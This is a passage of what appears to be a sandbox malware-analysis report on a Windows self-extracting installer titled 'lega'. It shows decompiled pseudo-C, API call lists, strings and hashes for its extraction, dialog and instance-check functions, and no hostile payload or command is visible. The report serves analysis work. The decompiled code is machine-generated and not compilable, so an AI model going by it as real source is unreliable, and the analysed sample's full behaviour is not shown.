				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00ac6cf7
0x00ac6d00
0x00ac6d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00AC6E26,00AC1000), ref: 00AC6CF7
UnhandledExceptionFilter.KERNEL32(00AC6E26,?,00AC6E26,00AC1000), ref: 00AC6D00
GetCurrentProcess.KERNEL32(C0000409,?,00AC6E26,00AC1000), ref: 00AC6D0B
TerminateProcess.KERNEL32(00000000,?,00AC6E26,00AC1000), ref: 00AC6D12

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 2cb79b378bdbf6d0707551eca3411c13c6c45089a7a7a68daa893c6bc2e459f8
Instruction ID: 0fcdbba18dad712142f30d72ee56acdf0a3506138f548d6a5fc0dace72f80a71
Opcode Fuzzy Hash: 2cb79b378bdbf6d0707551eca3411c13c6c45089a7a7a68daa893c6bc2e459f8
Instruction Fuzzy Hash: 66D0C93200010CFFDB006BF1EC0CE693F28EB5821AF4F4100F319C2020CA3244528B52

Uniqueness

Uniqueness Score: -1.00%

Function 00AC3210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00AC3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E00AC43D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "lega");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0xac9a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0xac91e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E00AC44B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0xac91e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0xac91e5 - 3;
						if(_t49 - 0xac91e5 < 3) {
							goto L32;
						}
						_t24 =  *0xac91e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0xac91e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E00AC658A(0xac91e4, 0x104, 0xac1140);
								_t27 = E00AC58C8(0xac91e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0xac91e4 - 0x5c;
									if( *0xac91e4 != 0x5c) {
										L30:
										_t30 = E00AC597D(0xac91e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0xac91e5 - 0x5c;
									if( *0xac91e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E00AC44B9(_t64, 0x54a, 0xac91e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0xac91e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0xac91e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0xac91e4 - 0x5c;
						if( *0xac91e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0xac9124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0xac9a3c, 0x3e8, 0xac8598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00AC4224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0xac87a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E00AC44B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x00ac321b
0x00ac321e
0x00ac3221
0x00ac343c
0x00ac343e
0x00ac343f
0x00ac3445
0x00ac3447
0x00000000
0x00ac3447
0x00ac3229
0x00ac322a
0x00ac322f
0x00ac33ec
0x00ac33f7
0x00ac3410
0x00ac3416
0x00ac341d
0x00ac342d
0x00ac342d
0x00ac3438
0x00000000
0x00ac3438
0x00ac3237
0x00ac3243
0x00ac3243
0x00ac3246
0x00ac32ee
0x00ac32f4
0x00ac32f6
0x00ac33d4
0x00ac33d6
0x00ac33db
0x00ac33dc
0x00ac33de
0x00ac33df
0x00ac3370
0x00ac3372
0x00000000
0x00ac3372
0x00ac32fc
0x00ac3301
0x00ac3301
0x00ac3303
0x00ac3304
0x00ac3304
0x00ac330a
0x00ac330d
0x00000000
0x00000000
0x00ac3313
0x00ac3318
0x00ac331a
0x00ac3331
0x00ac3332
0x00ac333a
0x00ac333d
0x00ac337c
0x00ac3388
0x00ac338f
0x00ac3394
0x00ac3396
0x00ac33a4
0x00ac33ab
0x00ac33b6
0x00ac33be
0x00ac33c3
0x00ac33c5
0x00ac3435
0x00ac3437
0x00ac3437
0x00000000
0x00ac3437
0x00ac33c7
0x00ac33c9
0x00ac33cc
0x00000000
0x00ac33cc
0x00ac33ad
0x00ac33b4
0x00000000
0x00000000
0x00000000
0x00ac33b4
0x00ac3398
0x00ac3399
0x00ac339b
0x00ac339c
0x00ac339d
0x00000000
0x00ac339d
0x00ac334c
0x00ac3351
0x00ac3354
0x00000000
0x00000000
0x00ac335c
0x00ac3362
0x00ac3364
0x00000000
0x00000000
0x00ac3366
0x00ac3367
0x00ac3369
0x00ac336a
0x00ac336b
0x00000000
0x00ac336b
0x00ac331c
0x00ac3323
0x00000000
0x00000000
0x00ac3329
0x00ac332b
0x00000000
0x00000000
0x00000000
0x00ac332b
0x00ac324c
0x00ac324c
0x00ac324f
0x00ac32c8
0x00ac32ce
0x00000000
0x00ac32ce
0x00ac3251
0x00ac3256
0x00000000
0x00000000
0x00ac3271
0x00ac3277
0x00ac3279
0x00ac3298
0x00ac329d
0x00ac329f
0x00000000
0x00000000
0x00ac32b0
0x00ac32b6
0x00ac32b8
0x00000000
0x00000000
0x00ac32be
0x00ac3280
0x00ac3289
0x00ac328e
0x00000000
0x00ac328e
0x00ac327b
0x00000000
0x00ac327b
0x00000000

APIs

LoadStringA.USER32(000003E8,00AC8598,00000200), ref: 00AC3271
GetDesktopWindow.USER32 ref: 00AC33E2
SetWindowTextA.USER32(?,lega), ref: 00AC33F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00AC3410
GetDlgItem.USER32(?,00000836), ref: 00AC3426
EnableWindow.USER32(00000000), ref: 00AC342D
EndDialog.USER32(?,00000000), ref: 00AC343F

Strings

lega, xrefs: 00AC33F1
C:\Users\user\AppData\Local\Temp\IXP002.TMP\, xrefs: 00AC32E2, 00AC32E7, 00AC3331, 00AC3344, 00AC335B, 00AC336A

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$lega
API String ID: 2418873061-3269709190
Opcode ID: 79f983bc294f9c62fecb899edbd949110ee5be0659990d76778ea94ac8436063
Instruction ID: 0eed8c0c5f6634439fcfa943ac7ac2041c38e518cfc307ed47ad4cc2ab4f1911
Opcode Fuzzy Hash: 79f983bc294f9c62fecb899edbd949110ee5be0659990d76778ea94ac8436063
Instruction Fuzzy Hash: 44516B32340284BBEF659B795D4DFBB2958DB96B55F17C12CF2029A1D0CEA4CE039261

Uniqueness

Uniqueness Score: -1.00%

Function 00AC2CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00AC2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0xac8004; // 0xc32e3ded
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0xac9a3c = __ecx;
				memset(0xac9140, 0, 0x8fc);
				memset(0xac8a20, 0, 0x32c);
				memset(0xac88c0, 0, 0x104);
				 *0xac93ec = 1;
				_t20 = E00AC468F("TITLE", 0xac9154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0xac858c = _t27;
					SetEvent(_t27);
					_t64 = 0xac9a34;
					if(E00AC468F("EXTRACTOPT", 0xac9a34, 4) != 0) {
						if(( *0xac9a34 & 0x000000c0) == 0) {
							L12:
							 *0xac9120 =  *0xac9120 & _t65;
							if(E00AC5C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0xac8a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0xac8184 != 0) {
										__imp__#17();
									}
									if( *0xac8a24 == 0) {
										_t57 = _t65;
										if(E00AC36EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0xac9a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0xac9a34 & 0x00000100) == 0 || ( *0xac8a38 & 0x00000001) != 0 || E00AC18A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00AC6517(_t57, 0x7d6, _t34, E00AC19E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00AC2390(0xac8a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E00AC44B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E00AC468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0xac8588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0xac9a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E00AC44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E00AC44B9(0, 0x54b, "lega", 0, 0x10, 0);
										L11:
										CloseHandle( *0xac8588);
										 *0xac9124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E00AC44B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0xac9124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00AC6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x00ac2cb5
0x00ac2cbc
0x00ac2cc7
0x00ac2cc9
0x00ac2cd1
0x00ac2cd3
0x00ac2cd9
0x00ac2ce9
0x00ac2cf9
0x00ac2d0e
0x00ac2d15
0x00ac2d1c
0x00ac2ef3
0x00000000
0x00ac2d2d
0x00ac2d34
0x00ac2d3b
0x00ac2d40
0x00ac2d48
0x00ac2d59
0x00ac2d84
0x00ac2e1f
0x00ac2e1f
0x00ac2e2e
0x00ac2e41
0x00ac2e5a
0x00ac2e62
0x00ac2e6c
0x00ac2e6c
0x00ac2e75
0x00ac2e77
0x00ac2e77
0x00ac2e84
0x00ac2e8b
0x00ac2e94
0x00000000
0x00ac2e96
0x00ac2e96
0x00ac2e9e
0x00ac2ea2
0x00ac2eba
0x00000000
0x00ac2ece
0x00ac2ede
0x00ac2eed
0x00000000
0x00000000
0x00000000
0x00000000
0x00ac2eed
0x00ac2eef
0x00ac2eef
0x00ac2eef
0x00ac2eef
0x00ac2ea2
0x00ac2e86
0x00ac2e88
0x00ac2e88
0x00ac2e43
0x00ac2e48
0x00000000
0x00ac2e48
0x00ac2e30
0x00ac2e30
0x00ac2ef8
0x00ac2f01
0x00000000
0x00ac2f01
0x00ac2d8a
0x00ac2d8f
0x00ac2da1
0x00000000
0x00ac2da3
0x00ac2dae
0x00ac2db4
0x00ac2dbb
0x00000000
0x00ac2dca
0x00ac2dd3
0x00ac2df5
0x00ac2e02
0x00000000
0x00000000
0x00000000
0x00000000
0x00ac2dd5
0x00ac2dde
0x00ac2de3
0x00ac2e04
0x00ac2e0a
0x00ac2e10
0x00000000
0x00ac2e10
0x00ac2dd3
0x00ac2dbb
0x00ac2da1
0x00ac2d5b
0x00ac2d5b
0x00ac2d5d
0x00ac2d69
0x00ac2d6e
0x00ac2f06
0x00ac2f06
0x00ac2f06
0x00ac2d59
0x00ac2f18

APIs

memset.MSVCRT ref: 00AC2CD9
memset.MSVCRT ref: 00AC2CE9
memset.MSVCRT ref: 00AC2CF9

Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46A0
Part of subcall function 00AC468F: SizeofResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46A9
Part of subcall function 00AC468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00AC46C3
Part of subcall function 00AC468F: LoadResource.KERNEL32(00000000,00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46CC
Part of subcall function 00AC468F: LockResource.KERNEL32(00000000,?,00AC2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46D3
Part of subcall function 00AC468F: memcpy_s.MSVCRT ref: 00AC46E5
Part of subcall function 00AC468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC46EF

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC2D34
SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC2D40
CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC2DAE
GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00AC2DBD
CloseHandle.KERNEL32(lega,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00AC2E0A

Part of subcall function 00AC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00AC4518
Part of subcall function 00AC44B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00AC4554

Strings

VERCHECK, xrefs: 00AC2E54
INSTANCECHECK, xrefs: 00AC2D95
EXTRACTOPT, xrefs: 00AC2D4D
TITLE, xrefs: 00AC2D09
lega, xrefs: 00AC2D04, 00AC2DD9, 00AC2DF0

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lega
API String ID: 1002816675-2051202908
Opcode ID: a565e2012a388a58a702d52bb3593d22c552e73fac5746f4ff2a383a006ad0b6
Instruction ID: 3c8f99bc891c78679299712b6fa28fb1568f7c913f7c7be3bd7f033258d440ab
Opcode Fuzzy Hash: a565e2012a388a58a702d52bb3593d22c552e73fac5746f4ff2a383a006ad0b6
Instruction Fuzzy Hash: 1D51E170340305ABE724EBA59D4AFBB3AA8EB55740F07403DF942E61D1DBB88C42CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00AC34F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00AC34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0xac91d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0xac8584 = _t35;
					E00AC43D0(_t35, GetDesktopWindow());
					__eflags =  *0xac8184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "lega");
					_t17 = CreateThread(0, 0, E00AC4FE0, 0, 0, 0xac8798);
					 *0xac879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E00AC44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0xac858c);
					_t38 =  *0xac8584; // 0x0
					_t25 = E00AC44B9(_t38, 0x4b2, 0xac1140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0xac91d8 = 1;
						SetEvent( *0xac858c);
						_t39 =  *0xac879c; // 0x0
						E00AC3680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0xac858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0xac879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}

0x00ac34fb
0x00ac34fe
0x00ac3665
0x00ac3666
0x00ac3666
0x00ac3668
0x00ac366e
0x00ac366e
0x00ac3671
0x00ac3671
0x00ac3677
0x00000000
0x00ac3677
0x00ac3504
0x00ac3506
0x00ac3507
0x00ac350c
0x00ac365b
0x00ac365f
0x00000000
0x00000000
0x00000000
0x00ac3661
0x00ac3512
0x00ac3515
0x00ac35be
0x00ac35c1
0x00ac35d1
0x00ac35d8
0x00ac35de
0x00ac35f8
0x00ac3617
0x00ac3617
0x00ac3623
0x00ac3637
0x00ac363d
0x00ac3642
0x00ac3644
0x00000000
0x00ac3646
0x00ac3652
0x00ac3657
0x00ac3658
0x00000000
0x00ac3658
0x00ac3644
0x00ac351b
0x00ac351d
0x00ac354f
0x00ac3553
0x00000000
0x00000000
0x00ac355f
0x00ac3565
0x00ac357c
0x00ac3581
0x00ac3584
0x00ac359b
0x00ac35a1
0x00ac35a7
0x00ac35ad
0x00ac35b3
0x00ac35b8
0x00000000
0x00ac35b8
0x00ac3586
0x00ac3588
0x00000000
0x00000000
0x00ac3590
0x00000000
0x00ac3590
0x00ac3524
0x00ac3535
0x00ac3541
0x00000000
0x00ac3549
0x00000000

APIs

TerminateThread.KERNEL32(00000000), ref: 00AC3535
EndDialog.USER32(?,?), ref: 00AC3541
ResetEvent.KERNEL32 ref: 00AC355F
SetEvent.KERNEL32(00AC1140,00000000,00000020,00000004), ref: 00AC3590
GetDesktopWindow.USER32 ref: 00AC35C7
GetDlgItem.USER32(?,0000083B), ref: 00AC35F1
SendMessageA.USER32(00000000), ref: 00AC35F8
GetDlgItem.USER32(?,0000083B), ref: 00AC3610
SendMessageA.USER32(00000000), ref: 00AC3617
SetWindowTextA.USER32(?,lega), ref: 00AC3623
CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,00AC8798), ref: 00AC3637
EndDialog.USER32(?,00000000), ref: 00AC3671

Strings

lega, xrefs: 00AC361D

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

Associated: 00000002.00000002.378508998.0000000000AC0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378527805.0000000000AC8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.378536959.0000000000ACC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_will3629.jbxd

Similarity

API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
String ID: lega
API String ID: 2406144884-245445314
Opcode ID: 358ee9668780f231a356fb9d14110c99257c4937078b8c5a94d29e16b412fa08
Instruction ID: 19bcfabb51849828e6318d96649891634d2b7fa8198e3e6c002f9847d9668ad2
Opcode Fuzzy Hash: 358ee9668780f231a356fb9d14110c99257c4937078b8c5a94d29e16b412fa08
Instruction Fuzzy Hash: A3319132240308BFDB209FA5AC4DF7B3A79F795B05F17861DF602952A0CA758902DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00AC4224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E00AC4224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E00AC44B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0xac88c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0xac87a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0xac8598;
					_v36 = 1;
					_v32 = E00AC4200;
					_v28 = 0xac88c0;
					 *0xaca288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0xaca288(_t32, 0xac88c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0xac88c0 != 0) {
							E00AC1680(0xac87a0, 0x104, 0xac88c0);
						}
						 *0xaca288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0xac87a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0xac88c0);
					_t61 = 0xac88c0;
					_t4 =  &(_t61[1]); // 0xac88c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0xac88c0; // 0x1591181
					_t44 = CharPrevA(0xac88c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0xac88c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}

0x00ac4234
0x00ac423c
0x00ac4240
0x00ac43b2
0x00ac43b7
0x00ac43c0
0x00000000
0x00ac43c5
0x00ac424c
0x00ac4252
0x00ac4257
0x00ac43a4
0x00ac43a5
0x00ac43ab
0x00000000
0x00ac43ab
0x00ac4263
0x00ac4269
0x00ac426e
0x00000000
0x00000000
0x00ac427a
0x00ac4280
0x00ac4285
0x00000000
0x00000000
0x00ac428d
0x00ac4293
0x00ac42e6
0x00ac42e9
0x00ac42ef
0x00ac42f4
0x00ac42f7
0x00ac4300
0x00ac4307
0x00ac430e
0x00ac4315
0x00ac431c
0x00ac4322
0x00ac4326
0x00ac432d
0x00ac432d
0x00ac432f
0x00ac4334
0x00ac4343
0x00ac4349
0x00ac434d
0x00ac4354
0x00ac4354
0x00ac435d
0x00ac436e
0x00ac436e
0x00ac437d
0x00ac4383
0x00ac4387
0x00ac438e
0x00ac438e
0x00ac4387
0x00ac4391
0x00ac4399
0x00000000
0x00ac4295
0x00ac429f
0x00ac42a5
0x00ac42aa
0x00ac42aa
0x00ac42ad
0x00ac42ad
0x00ac42af
0x00ac42b0
0x00ac42b6
0x00ac42c2
0x00ac42c8
0x00ac42ce
0x00ac42e4
0x00ac42e4
0x00000000
0x00ac42ce

APIs

LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00AC4236
GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00AC424C
GetProcAddress.KERNEL32(00000000,000000C3), ref: 00AC4263
GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00AC427A
GetTempPathA.KERNEL32(00000104,00AC88C0,?,00000001), ref: 00AC429F
CharPrevA.USER32(00AC88C0,01591181,?,00000001), ref: 00AC42C2
CharPrevA.USER32(00AC88C0,00000000,?,00000001), ref: 00AC42D6
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00AC4391
FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00AC43A5

Strings

SHBrowseForFolder, xrefs: 00AC4246
SHELL32.DLL, xrefs: 00AC422F
SHGetPathFromIDList, xrefs: 00AC4274

Memory Dump Source

Source File: 00000002.00000002.378516850.0000000000AC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00AC0000, based on PE: true

